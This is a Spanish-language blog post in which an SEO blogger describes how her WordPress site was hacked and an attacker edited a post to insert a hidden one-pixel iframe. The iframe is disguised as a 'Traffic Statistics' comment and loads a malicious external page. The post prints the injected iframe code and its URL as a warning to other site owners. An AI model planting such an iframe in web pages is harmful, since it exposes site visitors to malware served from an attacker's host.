Mar06

Código malicioso en Chica SEO

Categorías: Chica SEO, Wordpress  
Por: Natalia

Me cansa ya estos errores de seguridad que tiene wordpress, es súper inseguro, nosotras nunca podemos estar tranquilas. Primero fue una vulnerabilidad que hacia que hackers puedan inyectar código a los pies de cada wordpress. Eso nos afectó muchísimo, en una semana perdimos muchísimo posicionamiento, y después nos costó mucho subir el posicionamiento otra vez.

Ahora otro problema con la seguridad de Wordpress nos esta afectando, gracias a que Daniel me avisa que en un post alguien incrustó un Iframe con código malicioso. Esta persona que realizo el ataque, no agregó el código mediante un comentario, si no que modificó el código fuente del mismo post.

post4421

El código malicioso es el siguiente:

<!-- Traffic Statistics -->
<iframe src="http://www.wp-stats-php.info/iframe/wp-stats.php" frameborder="0" height="1" width="1">
</iframe>
<!-- End Traffic Statistics -->

El source del iframe es esta pagina:

http://www.wp-stats-php.info/iframe/wp-stats.php (No entren por las dudas: Gracias Juan Pablo)

Para ver el código malicioso es necesario utilizar una herramienta de visualización de header (http request returns) y lo que vemos es este código javascript:

La verdad es que no tengo idea que podía haber hecho este código, pero me imagino que nada bueno seguramente, dado que google advierte a los usuarios cuando intentan acceder a esta pagina mostrando esta pagina:

advert9

Y esto no es todo, google incluso eliminó esta pagina de su cache.

No se como lo pudieron haber hecho, quizás habrán utilizado alguna falla del Wordpress, pero me gustaría saber cual es, se que la versión anterior, la versión 2.3.2,  tenia una gruesa falla de seguridad, nosotras actualizamos tarde a la nueva versión 2.3.3 y aprovecharon esa brecha de tiempo para realizar esta inyección de código.

Estoy un poco decepcionada con Wordpress, es muy inseguro!.

¿Ustedes tuvieron un problema parecido?

Mas posts:

20 Comentarios en “Código malicioso en Chica SEO”

Tu comentario: